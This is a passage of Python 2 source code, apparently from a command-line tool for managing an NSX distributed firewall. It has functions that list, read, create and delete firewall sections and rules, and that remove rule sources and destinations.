l3_dfw_sections = list()
l2_section_list = [['---', '---', '---']]
l3r_section_list = [['---', '---', '---']]
l3_section_list = [['---', '---', '---']]
if type(l2_dfw_sections) is not list:
keys_and_values = zip(dict.keys(l2_dfw_sections), dict.values(l2_dfw_sections))
l2_dfw_sections = list()
l2_dfw_sections.append(dict(keys_and_values))
if type(l3_dfw_sections) is not list:
keys_and_values = zip(dict.keys(l3_dfw_sections), dict.values(l3_dfw_sections))
l3_dfw_sections = list()
l3_dfw_sections.append(dict(keys_and_values))
if type(l3r_dfw_sections) is not list:
keys_and_values = zip(dict.keys(l3r_dfw_sections), dict.values(l3r_dfw_sections))
l3r_dfw_sections = list()
l3r_dfw_sections.append(dict(keys_and_values))
if len(l2_dfw_sections) != 0:
l2_section_list = list()
for sl in l2_dfw_sections:
try:
section_name = sl['@name']
except KeyError:
section_name = '<empty name>'
l2_section_list.append((section_name, sl['@id'], sl['@type']))
if len(l3r_dfw_sections) != 0:
l3r_section_list = list()
for sl in l3r_dfw_sections:
try:
section_name = sl['@name']
except KeyError:
section_name = '<empty name>'
l3r_section_list.append((section_name, sl['@id'], sl['@type']))
if len(l3_dfw_sections) != 0:
l3_section_list = list()
for sl in l3_dfw_sections:
try:
section_name = sl['@name']
except KeyError:
section_name = '<empty name>'
l3_section_list.append((section_name, sl['@id'], sl['@type']))
return l2_section_list, l3r_section_list, l3_section_list, all_dfw_sections
def _dfw_section_list_print(client_session, **kwargs):
l2_section_list, l3r_section_list, l3_section_list, detailed_dfw_sections = dfw_section_list(client_session)
if kwargs['verbose']:
print detailed_dfw_sections
else:
print tabulate(l2_section_list, headers=["Name", "ID", "Type"], tablefmt="psql")
print tabulate(l3r_section_list, headers=["Name", "ID", "Type"], tablefmt="psql")
print tabulate(l3_section_list, headers=["Name", "ID", "Type"], tablefmt="psql")
def dfw_section_delete(client_session, section_id):
"""
This function delete a section given its id
:param client_session: An instance of an NsxClient Session
:param section_id: The id of the section that must be deleted
:return returns
- A table containing these information: Return Code (True/False), Section ID, Section Name, Section Type
- ( verbose option ) A list containing a single list which elements are Return Code (True/False),
Section ID, Section Name, Section Type
If there is no matching list
- Return Code is set to False
- Section ID is set to the value passed as input parameter
- Section Name is set to "---"
- Section Type is set to "---"
"""
l2_section_list, l3r_section_list, l3_section_list, detailed_dfw_sections = dfw_section_list(client_session)
dfw_section_id = str(section_id)
for i, val in enumerate(l3_section_list):
if dfw_section_id == str(val[1]) and str(val[0]) != 'Default Section Layer3':
client_session.delete('dfwL3SectionId', uri_parameters={'sectionId': dfw_section_id})
result = [["True", dfw_section_id, str(val[0]), str(val[-1])]]
return result
if dfw_section_id == str(val[1]) and str(val[0]) == 'Default Section Layer3':
result = [["False-Delete Default Section is not allowed", dfw_section_id, "---", "---"]]
return result
for i, val in enumerate(l2_section_list):
if dfw_section_id == str(val[1]) and str(val[0]) != 'Default Section Layer2':
client_session.delete('dfwL2SectionId', uri_parameters={'sectionId': dfw_section_id})
result = [["True", dfw_section_id, str(val[0]), str(val[-1])]]
return result
if dfw_section_id == str(val[1]) and str(val[0]) == 'Default Section Layer2':
result = [["False-Delete Default Section is not allowed", dfw_section_id, "---", "---"]]
return result
for i, val in enumerate(l3r_section_list):
if dfw_section_id == str(val[1]) and str(val[0]) != 'Default Section':
client_session.delete('section', uri_parameters={'section': dfw_section_id})
result = [["True", dfw_section_id, str(val[0]), str(val[-1])]]
return result
if dfw_section_id == str(val[1]) and str(val[0]) == 'Default Section':
result = [["False-Delete Default Section is not allowed", dfw_section_id, "---", "---"]]
return result
result = [["False", dfw_section_id, "---", "---"]]
return result
def _dfw_section_delete_print(client_session, **kwargs):
if not (kwargs['dfw_section_id']):
print ('Mandatory parameters missing: [-sid SECTION ID]')
return None
section_id = kwargs['dfw_section_id']
result = dfw_section_delete(client_session, section_id)
if kwargs['verbose']:
print result
else:
print tabulate(result, headers=["Return Code", "Section ID", "Section Name", "Section Type"], tablefmt="psql")
def dfw_rule_delete(client_session, rule_id):
"""
This function delete a dfw rule given its id
:param client_session: An instance of an NsxClient Session
:param rule_id: The id of the rule that must be deleted
:return returns
- A table containing these information: Return Code (True/False), Rule ID, Rule Name, Applied-To, Section ID
- ( verbose option ) A list containing a single list which elements are Return Code (True/False),
Rule ID, Rule Name, Applied-To, Section ID
If there is no matching rule
- Return Code is set to False
- Rule ID is set to the value passed as input parameter
- All other returned parameters are set to "---"
"""
l2_rule_list, l3_rule_list, l3r_rule_list = dfw_rule_list(client_session)
dfw_rule_id = str(rule_id)
for i, val in enumerate(l3_rule_list):
if dfw_rule_id == str(val[0]) and str(val[1]) != 'Default Rule':
dfw_section_id = str(val[-1])
section_list, dfwL3_section_details = dfw_section_read(client_session, dfw_section_id)
etag = str(section_list[0][3])
client_session.delete('dfwL3Rule', uri_parameters={'ruleId': dfw_rule_id, 'sectionId': dfw_section_id},
additional_headers={'If-match': etag})
result = [["True", dfw_rule_id, str(val[1]), str(val[-2]), str(val[-1])]]
return result
else:
result = [["False-Delete Default Rule is not allowed", dfw_rule_id, "---", "---", "---"]]
return result
for i, val in enumerate(l2_rule_list):
if dfw_rule_id == str(val[0]) and str(val[1]) != 'Default Rule':
dfw_section_id = str(val[-1])
section_list, dfwL2_section_details = dfw_section_read(client_session, dfw_section_id)
etag = str(section_list[0][3])
client_session.delete('dfwL2Rule', uri_parameters={'ruleId': dfw_rule_id, 'sectionId': dfw_section_id},
additional_headers={'If-match': etag})
result = [["True", dfw_rule_id, str(val[1]), str(val[-2]), str(val[-1])]]
return result
else:
result = [["False-Delete Default Rule is not allowed", dfw_rule_id, "---", "---", "---"]]
return result
for i, val in enumerate(l3r_rule_list):
if dfw_rule_id == str(val[0]) and str(val[1]) != 'Default Rule':
dfw_section_id = str(val[-1])
section_list, dfwL3r_section_details = dfw_section_read(client_session, dfw_section_id)
etag = str(section_list[0][3])
client_session.delete('rule', uri_parameters={'ruleID': dfw_rule_id, 'section': dfw_section_id})
result = [["True", dfw_rule_id, str(val[1]), str(val[-2]), str(val[-1])]]
return result
else:
result = [["False-Delete Default Rule is not allowed", dfw_rule_id, "---", "---", "---"]]
return result
result = [["False", dfw_rule_id, "---", "---", "---"]]
return result
def _dfw_rule_delete_print(client_session, **kwargs):
if not (kwargs['dfw_rule_id']):
print ('Mandatory parameters missing: [-rid RULE ID]')
return None
rule_id = kwargs['dfw_rule_id']
result = dfw_rule_delete(client_session, rule_id)
if kwargs['verbose']:
print result
else:
print tabulate(result, headers=["Return Code", "Rule ID", "Rule Name", "Applied-To", "Section ID"],
tablefmt="psql")
def dfw_section_id_read(client_session, dfw_section_name):
"""
This function returns the section(s) ID(s) given a section name
:param client_session: An instance of an NsxClient Session
:param dfw_section_name: The name ( case sensitive ) of the section for which the ID is wanted
:return returns
- A list of dictionaries. Each dictionary contains the type and the id of each section with named as
specified by the input parameter. If no such section exist, the list contain a single dictionary with
{'Type': 0, 'Id': 0}
"""
l2_section_list, l3r_section_list, l3_section_list, detailed_dfw_sections = dfw_section_list(client_session)
dfw_section_id = list()
dfw_section_name = str(dfw_section_name)
for i, val in enumerate(l3_section_list):
if str(val[0]) == dfw_section_name:
dfw_section_id.append({'Type': str(val[2]), 'Id': int(val[1])})
for i, val in enumerate(l3r_section_list):
if str(val[0]) == dfw_section_name:
dfw_section_id.append({'Type': str(val[2]), 'Id': int(val[1])})
for i, val in enumerate(l2_section_list):
if str(val[0]) == dfw_section_name:
dfw_section_id.append({'Type': str(val[2]), 'Id': int(val[1])})
if len(dfw_section_id) == 0:
dfw_section_id.append({'Type': 0, 'Id': 0})
return dfw_section_id
def _dfw_section_id_read_print(client_session, **kwargs):
if not (kwargs['dfw_section_name']):
print ('Mandatory parameters missing: [-sname SECTION NAME]')
return None
dfw_section_name = str(kwargs['dfw_section_name'])
dfw_section_id = dfw_section_id_read(client_session, dfw_section_name)
if kwargs['verbose']:
print dfw_section_id
else:
dfw_section_id_csv = ",".join([str(section['Id']) for section in dfw_section_id])
print dfw_section_id_csv
def dfw_rule_id_read(client_session, dfw_section_id, dfw_rule_name):
"""
This function returns the rule(s) ID(s) given a section id and a rule name
:param client_session: An instance of an NsxClient Session
:param dfw_rule_name: The name ( case sensitive ) of the rule for which the ID is/are wanted. If rhe name includes
includes spaces, enclose it between ""
:param dfw_section_id: The id of the section where the rule must be searched
:return returns
- A dictionary with the rule name as the key and a list as a value. The list contains all the matching
rules id(s). For example {'RULE_ONE': [1013, 1012]}. If no matching rule exist, an empty dictionary is
returned
"""
l2_rule_list, l3_rule_list, l3r_rule_list = dfw_rule_list(client_session)
list_names = list()
list_ids = list()
dfw_rule_name = str(dfw_rule_name)
dfw_section_id = str(dfw_section_id)
for i, val in enumerate(l2_rule_list):
if (dfw_rule_name == val[1]) and (dfw_section_id == val[-1]):
list_names.append(dfw_rule_name)
list_ids.append(int(val[0]))
for i, val in enumerate(l3_rule_list):
if (dfw_rule_name == val[1]) and (dfw_section_id == val[-1]):
list_names.append(dfw_rule_name)
list_ids.append(int(val[0]))
for i, val in enumerate(l3r_rule_list):
if (dfw_rule_name == val[1]) and (dfw_section_id == val[-1]):
list_names.append(dfw_rule_name)
list_ids.append(int(val[0]))
dfw_rule_id = dict.fromkeys(list_names, list_ids)
return dfw_rule_id
def _dfw_rule_id_read_print(client_session, **kwargs):
if not (kwargs['dfw_rule_name']):
print ('Mandatory parameters missing: [-rname RULE NAME (use "" if name includes spaces)]')
return None
if not (kwargs['dfw_section_id']):
print ('Mandatory parameters missing: [-sid SECTION ID]')
return None
dfw_section_id = str(kwargs['dfw_section_id'])
dfw_rule_name = str(kwargs['dfw_rule_name'])
dfw_rule_id = dfw_rule_id_read(client_session, dfw_section_id, dfw_rule_name)
if kwargs['verbose']:
print dfw_rule_id
else:
try:
dfw_rule_ids_str = [str(ruleid) for ruleid in dfw_rule_id[dfw_rule_name]]
dfw_rule_id_csv = ",".join(dfw_rule_ids_str)
print tabulate([(dfw_rule_name, dfw_rule_id_csv)], headers=["Rule Name", "Rule IDs"], tablefmt="psql")
except KeyError:
print 'Rule name {} not found in section Id {}'.format(kwargs['dfw_rule_name'], kwargs['dfw_section_id'])
def dfw_rule_list(client_session):
"""
This function returns all the rules of the NSX distributed firewall
:param client_session: An instance of an NsxClient Session
:return returns
- a tabular view of all the dfw rules defined across L2, L3, L3Redirect
- ( verbose option ) a list containing as many list as the number of dfw rules defined across
L2, L3, L3Redirect (in this order). For each rule, these fields are returned:
"ID", "Name", "Source", "Destination", "Service", "Action", "Direction", "Packet Type", "Applied-To",
"ID (Section)"
"""
all_dfw_sections_response = client_session.read('dfwConfig')
all_dfw_sections = client_session.normalize_list_return(all_dfw_sections_response['body']['firewallConfiguration'])
if str(all_dfw_sections[0]['layer3Sections']) != 'None':
l3_dfw_sections = all_dfw_sections[0]['layer3Sections']['section']
else:
l3_dfw_sections = list()
if str(all_dfw_sections[0]['layer2Sections']) != 'None':
l2_dfw_sections = all_dfw_sections[0]['layer2Sections']['section']
else:
l2_dfw_sections = list()
if str(all_dfw_sections[0]['layer3RedirectSections']) != 'None':
l3r_dfw_sections = all_dfw_sections[0]['layer3RedirectSections']['section']
else:
l3r_dfw_sections = list()
if type(l2_dfw_sections) is not list:
keys_and_values = zip(dict.keys(l2_dfw_sections), dict.values(l2_dfw_sections))
l2_dfw_sections = list()
l2_dfw_sections.append(dict(keys_and_values))
if type(l3_dfw_sections) is not list:
keys_and_values = zip(dict.keys(l3_dfw_sections), dict.values(l3_dfw_sections))
l3_dfw_sections = list()
l3_dfw_sections.append(dict(keys_and_values))
if type(l3r_dfw_sections) is not list:
keys_and_values = zip(dict.keys(l3r_dfw_sections), dict.values(l3r_dfw_sections))
l3r_dfw_sections = list()
l3r_dfw_sections.append(dict(keys_and_values))
l2_temp = list()
l2_rule_list = list()
if len(l2_dfw_sections) != 0:
for i, val in enumerate(l2_dfw_sections):
if 'rule' in val:
l2_temp.append(l2_dfw_sections[i])
l2_dfw_sections = l2_temp
if len(l2_dfw_sections) > 0:
if 'rule' in l2_dfw_sections[0]:
rule_list = list()
for sptr in l2_dfw_sections:
section_rules = client_session.normalize_list_return(sptr['rule'])
l2_rule_list = dfw_rule_list_helper(client_session, section_rules, rule_list)
else:
l2_rule_list = []
l3_temp = list()
l3_rule_list = list()
if len(l3_dfw_sections) != 0:
for i, val in enumerate(l3_dfw_sections):
if 'rule' in val:
l3_temp.append(l3_dfw_sections[i])
l3_dfw_sections = l3_temp
if len(l3_dfw_sections) > 0:
if 'rule' in l3_dfw_sections[0]:
rule_list = list()
for sptr in l3_dfw_sections:
section_rules = client_session.normalize_list_return(sptr['rule'])
l3_rule_list = dfw_rule_list_helper(client_session, section_rules, rule_list)
else:
l3_rule_list = []
l3r_temp = list()
l3r_rule_list = list()
if len(l3r_dfw_sections) != 0:
for i, val in enumerate(l3r_dfw_sections):
if 'rule' in val:
l3r_temp.append(l3r_dfw_sections[i])
l3r_dfw_sections = l3r_temp
if len(l3r_dfw_sections) > 0:
if 'rule' in l3r_dfw_sections[0]:
rule_list = list()
for sptr in l3r_dfw_sections:
section_rules = client_session.normalize_list_return(sptr['rule'])
l3r_rule_list = dfw_rule_list_helper(client_session, section_rules, rule_list)
else:
l3r_rule_list = []
return l2_rule_list, l3_rule_list, l3r_rule_list
def _dfw_rule_list_print(client_session, **kwargs):
l2_rule_list, l3_rule_list, l3r_rule_list = dfw_rule_list(client_session)
if kwargs['verbose']:
print l2_rule_list, l3_rule_list, l3r_rule_list
else:
print ''
print '*** ETHERNET RULES ***'
print tabulate(l2_rule_list, headers=["ID", "Name", "Source", "Destination", "Service", "Action", "Direction",
"Packet Type", "Applied-To", "ID (Section)"], tablefmt="psql")
print ''
print '*** LAYER 3 RULES ***'
print tabulate(l3_rule_list, headers=["ID", "Name", "Source", "Destination", "Service", "Action", "Direction",
"Packet Type", "Applied-To", "ID (Section)"], tablefmt="psql")
print''
print '*** REDIRECT RULES ***'
print tabulate(l3r_rule_list, headers=["ID", "Name", "Source", "Destination", "Service", "Action", "Direction",
"Packet Type", "Applied-To", "ID (Section)"], tablefmt="psql")
def dfw_rule_read(client_session, rule_id):
"""
This function retrieves details of a dfw rule given its id
:param client_session: An instance of an NsxClient Session
:param rule_id: The ID of the dfw rule to retrieve
:return: returns
- tabular view of the dfw rule
- ( verbose option ) a list containing the dfw rule information: ID(Rule)- Name(Rule)- Source- Destination-
Services- Action - Direction- Pktytpe- AppliedTo- ID(section)
"""
rule_list = dfw_rule_list(client_session)
rule = list()
for sectionptr in rule_list:
for ruleptr in sectionptr:
if ruleptr[0] == str(rule_id):
rule.append(ruleptr)
return rule
def _dfw_rule_read_print(client_session, **kwargs):
if not (kwargs['dfw_rule_id']):
print ('Mandatory parameters missing: [-rid RULE ID]')
return None
rule_id = kwargs['dfw_rule_id']
rule = dfw_rule_read(client_session, rule_id)
if kwargs['verbose']:
print rule
else:
print tabulate(rule, headers=["ID", "Name", "Source", "Destination", "Service", "Action", "Direction",
"Packet Type", "Applied-To", "ID (Section)"], tablefmt="psql")
def dfw_rule_source_delete(client_session, rule_id, source):
"""
This function delete one of the sources of a dfw rule given the rule id and the source to be deleted
If two or more sources have the same name, the function will delete all of them
:param client_session: An instance of an NsxClient Session
:param rule_id: The ID of the dfw rule to retrieve
:param source: The source of the dfw rule to be deleted. If the source name contains any space, then it must be
enclosed in double quotes (like "VM Network")
:return: returns
- tabular view of the dfw rule after the deletion process has been performed
- ( verbose option ) a list containing a list with the following dfw rule informations after the deletion
process has been performed: ID(Rule)- Name(Rule)- Source- Destination- Services- Action - Direction-
Pktytpe- AppliedTo- ID(section)
"""
source = str(source)
rule = dfw_rule_read(client_session, rule_id)
if len(rule) == 0:
# It means a rule with id = rule_id does not exist
result = [[rule_id, "---", source, "---", "---", "---", "---", "---", "---", "---"]]
return result
# Get the rule data structure that will be modified and then piped into the update function
section_list = dfw_section_list(client_session)
sections = [section_list[0], section_list[1], section_list[2]]
section_id = rule[0][-1]
rule_type_selector = ''
for scan in sections:
for val in scan:
if val[1] == section_id:
rule_type_selector = val[2]
if rule_type_selector == '':
print 'ERROR: RULE TYPE SELECTOR CANNOT BE EMPTY - ABORT !'
return
if rule_type_selector == 'LAYER2':
rule_type = 'dfwL2Rule'
elif rule_type_selector == 'LAYER3':
rule_type = 'dfwL3Rule'
else:
rule_type = 'rule'
rule_schema = client_session.read(rule_type, uri_parameters={'ruleId': rule_id, 'sectionId': section_id})
rule_etag = rule_schema.items()[-1][1]
if 'sources' not in rule_schema.items()[1][1]['rule']:
# It means the only source is "any" and it cannot be deleted short of deleting the whole rule
rule = dfw_rule_read(client_session, rule_id)
return rule
if type(rule_schema.items()[1][1]['rule']['sources']['source']) == list:
# It means there are more than one sources, each one with his own dict
sources_list = rule_schema.items()[1][1]['rule']['sources']['source']
for i, val in enumerate(sources_list):
if val['type'] == 'Ipv4Address' and val['value'] == source or 'name' in val and val['name'] == source:
del rule_schema.items()[1][1]['rule']['sources']['source'][i]
# The order dict "rule_schema" must be parsed to find the dict that will be piped into the update function
rule = client_session.update(rule_type, uri_parameters={'ruleId': rule_id, 'sectionId': section_id},
request_body_dict=rule_schema.items()[1][1],
additional_headers={'If-match': rule_etag})
rule = dfw_rule_read(client_session, rule_id)
return rule
if type(rule_schema.items()[1][1]['rule']['sources']['source']) == dict:
# It means there is just one explicit source with his dict
source_dict = rule_schema.items()[1][1]['rule']['sources']['source']
if source_dict['type'] == 'Ipv4Address' and source_dict['value'] == source or \
'name' in dict.keys(source_dict) and source_dict['name'] == source:
del rule_schema.items()[1][1]['rule']['sources']
rule = client_session.update(rule_type, uri_parameters={'ruleId': rule_id, 'sectionId': section_id},
request_body_dict=rule_schema.items()[1][1],
additional_headers={'If-match': rule_etag})
rule = dfw_rule_read(client_session, rule_id)
return rule
def _dfw_rule_source_delete_print(client_session, **kwargs):
if not (kwargs['dfw_rule_id']):
print ('Mandatory parameters missing: [-rid RULE ID]')
return None
if not (kwargs['dfw_rule_source']):
print ('Mandatory parameters missing: [-src RULE SOURCE]')
return None
rule_id = kwargs['dfw_rule_id']
source = kwargs['dfw_rule_source']
rule = dfw_rule_source_delete(client_session, rule_id, source)
if kwargs['verbose']:
print rule
else:
print tabulate(rule, headers=["ID", "Name", "Source", "Destination", "Service", "Action", "Direction",
"Packet Type", "Applied-To", "ID (Section)"], tablefmt="psql")
def dfw_rule_destination_delete(client_session, rule_id, destination):
"""
This function delete one of the destinations of a dfw rule given the rule id and the destination to be deleted.
If two or more destinations have the same name, the function will delete all of them
:param client_session: An instance of an NsxClient Session
:param rule_id: The ID of the dfw rule to retrieve
:param destination: The destination of the dfw rule to be deleted. If the destination name contains any space, then
it must be enclosed in double quotes (like "VM Network")
:return: returns
- tabular view of the dfw rule after the deletion process has been performed
- ( verbose option ) a list containing a list with the following dfw rule informations after the deletion
process has been performed: ID(Rule)- Name(Rule)- Source- Destination- Services- Action - Direction-
Pktytpe- AppliedTo- ID(section)
"""
destination = str(destination)
rule = dfw_rule_read(client_session, rule_id)
if len(rule) == 0:
# It means a rule with id = rule_id does not exist
result = [[rule_id, "---", "---", destination, "---", "---", "---", "---", "---", "---"]]
return result
# Get the rule data structure that will be modified and then piped into the update function
section_list = dfw_section_list(client_session)
sections = [section_list[0], section_list[1], section_list[2]]
section_id = rule[0][-1]
rule_type_selector = ''
for scan in sections:
for val in scan:
if val[1] == section_id:
rule_type_selector = val[2]
if rule_type_selector == '':
print 'ERROR: RULE TYPE SELECTOR CANNOT BE EMPTY - ABORT !'
return
if rule_type_selector == 'LAYER2':
rule_type = 'dfwL2Rule'
elif rule_type_selector == 'LAYER3':
rule_type = 'dfwL3Rule'
else:
rule_type = 'rule'
rule_schema = client_session.read(rule_type, uri_parameters={'ruleId': rule_id, 'sectionId': section_id})
rule_etag = rule_schema.items()[-1][1]
if 'destinations' not in rule_schema.items()[1][1]['rule']:
# It means the only destination is "any" and it cannot be deleted short of deleting the whole rule
rule = dfw_rule_read(client_session, rule_id)
return rule
if type(rule_schema.items()[1][1]['rule']['destinations']['destination']) == list:
# It means there are more than one destinations, each one with his own dict
destination_list = rule_schema.items()[1][1]['rule']['destinations']['destination']
for i, val in enumerate(destination_list):
if val['type'] == 'Ipv4Address' and val['value'] == destination or \
'name' in val and val['name'] == destination:
del rule_schema.items()[1][1]['rule']['destinations']['destination'][i]
# The order dict "rule_schema" must be parsed to find the dict that will be piped into the update function
rule = client_session.update(rule_type, uri_parameters={'ruleId': rule_id, 'sectionId': section_id},
request_body_dict=rule_schema.items()[1][1],
additional_headers={'If-match': rule_etag})
rule = dfw_rule_read(client_session, rule_id)
return rule
if type(rule_schema.items()[1][1]['rule']['destinations']['destination']) == dict:
# It means there is just one explicit destination with his dict
destination_dict = rule_schema.items()[1][1]['rule']['destinations']['destination']
if destination_dict['type'] == 'Ipv4Address' and destination_dict['value'] == destination or \
'name' in dict.keys(destination_dict) and \
destination_dict['name'] == destination:
del rule_schema.items()[1][1]['rule']['destinations']
rule = client_session.update(rule_type, uri_parameters={'ruleId': rule_id, 'sectionId': section_id},
request_body_dict=rule_schema.items()[1][1],
additional_headers={'If-match': rule_etag})
rule = dfw_rule_read(client_session, rule_id)
return rule
def _dfw_rule_destination_delete_print(client_session, **kwargs):
if not (kwargs['dfw_rule_id']):
print ('Mandatory parameters missing: [-rid RULE ID]')
return None
if not (kwargs['dfw_rule_destination']):
print ('Mandatory parameters missing: [-dst RULE DESTINATION]')
return None
rule_id = kwargs['dfw_rule_id']
destination = kwargs['dfw_rule_destination']
rule = dfw_rule_destination_delete(client_session, rule_id, destination)
if kwargs['verbose']:
print rule
else:
print tabulate(rule, headers=["ID", "Name", "Source", "Destination", "Service", "Action", "Direction",
"Packet Type", "Applied-To", "ID (Section)"], tablefmt="psql")
#def dfw_rule_create(client_session, vccontent, section_id, rule_name, rule_direction, rule_pktype, rule_disabled,
#rule_action, rule_applyto, rule_source_type, rule_source_name, rule_source_value,
#rule_source_excluded, rule_destination_type, rule_destination_name, rule_destination_value,
#rule_destination_excluded, rule_service_protocolname, rule_service_destport,
#rule_service_srcport, rule_service_name, rule_note, rule_tag, rule_logged):
def dfw_rule_create(client_session, section_id, rule_name, rule_source_value, rule_destination_value, rule_direction,
rule_pktype, rule_applyto, rule_disabled='false', rule_action='allow',
rule_source_type='Ipv4Address', rule_destination_type='Ipv4Address', rule_source_excluded='false',
rule_destination_excluded='false', rule_logged='false', rule_source_name=None,
rule_destination_name=None, rule_service_protocolname=None, rule_service_destport=None,
rule_service_srcport=None, rule_service_name=None, rule_note=None, rule_tag=None, vccontent=None):
if rule_applyto == 'any':
rule_applyto = 'ANY'
elif rule_applyto == 'dfw':
rule_applyto = 'DISTRIBUTED_FIREWALL'
elif rule_applyto == 'edgegw':
rule_applyto = 'ALL_EDGES'
if not rule_source_name:
rule_source_name = ''
if not rule_destination_name:
rule_destination_name = ''
if not rule_service_protocolname:
rule_service_protocolname = ''
if not rule_service_destport:
rule_service_destport = ''
if not rule_service_srcport:
rule_service_srcport = ''
if not rule_service_name:
rule_service_name = ''
if not rule_note:
rule_note = ''
if not rule_tag:
rule_tag = ''
if not vccontent:
vccontent = ''
# TODO: complete the description
API_TYPES = {'dc': 'Datacenter', 'ipset': 'IPSet', 'macset': 'MACSet', 'ls': 'VirtualWire',
'secgroup': 'SecurityGroup', 'host': 'HostSystem', 'vm':'VirtualMachine',
'cluster': 'ClusterComputeResource', 'dportgroup': 'DistributedVirtualPortgroup',
'portgroup': 'Network', 'respool': 'ResourcePool', 'vapp': 'ResourcePool', 'vnic': 'VirtualMachine',
'Ipv4Address': 'Ipv4Address'}
# Verify that in the target section a rule with the same name does not exist
# Find the rule type from the target section
l2_rule_list, l3_rule_list, l3r_rule_list = dfw_rule_list(client_session)
section_list = dfw_section_list(client_session)
sections = [section_list[0], section_list[1], section_list[2]]
rule_type_selector = ''
for scan in sections:
for val in scan:
if val[1] == section_id:
rule_type_selector = val[2]
if rule_type_selector == '':
print 'Error: cannot find a section matching the section-id specified. Aborting. No action have been performed ' \
'on the system'
return
if rule_type_selector == 'LAYER2' or rule_type_selector == 'LAYER3':
if rule_type_selector == 'LAYER2':
for val in l2_rule_list:
if val[1] == rule_name:
print 'Error: a rule with the same name already exist. Aborting. No action have been performed on' \
' the system'
return
rule_type = 'dfwL2Rules'
section_type = 'dfwL2SectionId'
if rule_pktype != 'any':
print ('For a L2 rule "any" is the only allowed value for parameter -pktype')
return None
if rule_action != 'allow' and rule_action != 'block':
print ('For a L2 rule "allow/block" are the only allowed value for parameter -action')
return None
# For L2 rules where the GUI shows "block" the python data structure for the API call needs "deny"
# At the cli level this must be hidden to avoid confusing the user with too many options for the same action
if rule_action == 'block':
rule_action = 'deny'
if rule_applyto == 'ANY' or rule_applyto == 'ALL_EDGES':
print ('For a L2 rule "any" and "edgegw" are not allowed values for parameter -appto')
return None
if rule_source_type == 'IPSet' or rule_destination_type == 'IPSet':
print ('For a L2 rule "IPSET" is not an allowed value neither as source nor as destination')
return None
if rule_type_selector == 'LAYER3':
# For L3 rules where the GUI shows "block" the python data structure for the API call needs "deny"
# At the cli level this must be hidden to avoid confusing the user with too many options for the same action
if rule_action == 'block':
rule_action = 'deny'
for val in l3_rule_list:
if val[1] == rule_name:
print 'Error: a rule with the same name already exist. Aborting. No action have been performed on' \
' the system'
return
rule_type = 'dfwL3Rules'
section_type = 'dfwL3SectionId'
# The schema for L2rules is the same as for L3rules
rule_schema = client_session.extract_resource_body_example('dfwL3Rules', 'create')
else:
for val in l3r_rule_list:
if val[1] == rule_name:
print 'Error: a rule with the same name already exist. Aborting. No action have been performed on' \
' the system'
return
rule_type = 'rules'
section_type = 'section'
rule_schema = client_session.extract_resource_body_example(rule_type, 'create')
print 'Error: L3 redirect rules are not supported in this version. Aborting. No action have been performed on' \
' the system'
return
section = client_session.read(section_type, uri_parameters={'sectionId': section_id})
section_etag = section.items()[-1][1]
if rule_type != 'rules':
# L3 or L2 rule
# Mandatory values of a rule
rule_schema['rule']['name'] = str(rule_name)
# If appliedTo is 'ALL_EDGES' only inout is allowed
rule_schema['rule']['direction'] = str(rule_direction)
# If appliedTo is 'ALL_EDGES' only packetType any is allowed
rule_schema['rule']['packetType'] = str(rule_pktype)
rule_schema['rule']['@disabled'] = str(rule_disabled)
rule_schema['rule']['action'] = str(rule_action)
rule_schema['rule']['appliedToList']['appliedTo']['value'] = str(rule_applyto)
# Optional values of a rule. I believe it's cleaner to set them anyway, even if to an empty value
rule_schema['rule']['notes'] = rule_note
# If appliedTo is 'ALL_EDGES' no tags are allowed
rule_schema['rule']['tag'] = rule_tag
rule_schema['rule']['@logged'] = rule_logged
# Deleting all the three following sections will create the simplest any any any allow any rule
#
# If the source value is "any" the section needs to be deleted
if rule_source_value == 'any':
del rule_schema['rule']['sources']
# Mandatory values of a source ( NB: source is an optional value )
elif rule_source_value != '':
rule_schema['rule']['sources']['source']['value'] = rule_source_value
rule_schema['rule']['sources']['source']['type'] = API_TYPES[rule_source_type]
# Optional values of a source ( if specified )
if rule_source_excluded != '':
rule_schema['rule']['sources']['@excluded'] = rule_source_excluded
elif rule_source_name != '':
# Code to map name to value
rule_source_value = nametovalue(vccontent, client_session, rule_source_name, rule_source_type)
if rule_source_value == '':
print 'Matching Source Object ID not found - Abort - No operations have been performed on the system'
return
rule_schema['rule']['sources']['source']['value'] = rule_source_value
rule_schema['rule']['sources']['source']['type'] = API_TYPES[rule_source_type]
# Optional values of a source ( if specified )
if rule_source_excluded != '':
rule_schema['rule']['sources']['@excluded'] = rule_source_excluded
# If the destination value is "any" the section needs to be deleted
if rule_destination_value == 'any':
del rule_schema['rule']['destinations']
# Mandatory values of a destination ( NB: destination is an optional value )
elif rule_destination_value != '':
rule_schema['rule']['destinations']['destination']['value'] = rule_destination_value
#rule_schema['rule']['destinations']['destination']['type'] = rule_destination_type
rule_schema['rule']['destinations']['destination']['type'] = API_TYPES[rule_destination_type]
# Optional values of a destination ( if specified )
if rule_destination_excluded != '':
rule_schema['rule']['destinations']['@excluded'] = rule_destination_excluded
elif rule_destination_name != '':
# Code to map name to value
rule_destination_value = nametovalue(vccontent, client_session, rule_destination_name,
rule_destination_type)
if rule_destination_value == '':
print 'Matching Destination Object ID not found - No operations have been performed on the system'
return
rule_schema['rule']['destinations']['destination']['value'] = rule_destination_value
rule_schema['rule']['destinations']['destination']['type'] = API_TYPES[rule_destination_type]
# Optional values of a destination ( if specified )
if rule_destination_excluded != '':
rule_schema['rule']['destinations']['@excluded'] = rule_destination_excluded
# If no services are specified the section needs to be deleted
if rule_service_protocolname == '' and rule_service_destport == '' and rule_service_name == '':
del rule_schema['rule']['services']
elif rule_service_protocolname != '' and rule_service_destport != '' and rule_service_name != '':
print ('Service can be specified either via protocol/port or name')
return
elif rule_service_protocolname != '':
# Mandatory values of a service specified via protocol ( NB: service is an optional value )
rule_schema['rule']['services']['service']['protocolName'] = rule_service_protocolname
if rule_service_destport != '':
rule_schema['rule']['services']['service']['destinationPort'] = rule_service_destport
# Optional values of a service specified via protocol ( if specified )
if rule_service_srcport != '':
rule_schema['rule']['services']['service']['sourcePort'] = rule_service_srcport
elif rule_service_name != '':
# Mandatory values of a service specified via application/application group (service is an optional value)
rule_schema['rule']['services']['service']['value'] = ''
services = client_session.read('servicesScope', uri_parameters={'scopeId': 'globalroot-0'})
service = services.items()[1][1]['list']['application']
for servicedict in service:
if str(servicedict['name']) == rule_service_name:
rule_schema['rule']['services']['service']['value'] = str(servicedict['objectId'])
if rule_schema['rule']['services']['service']['value'] == '':
servicegroups = client_session.read('serviceGroups', uri_parameters={'scopeId': 'globalroot-0'})
servicegrouplist = servicegroups.items()[1][1]['list']['applicationGroup']
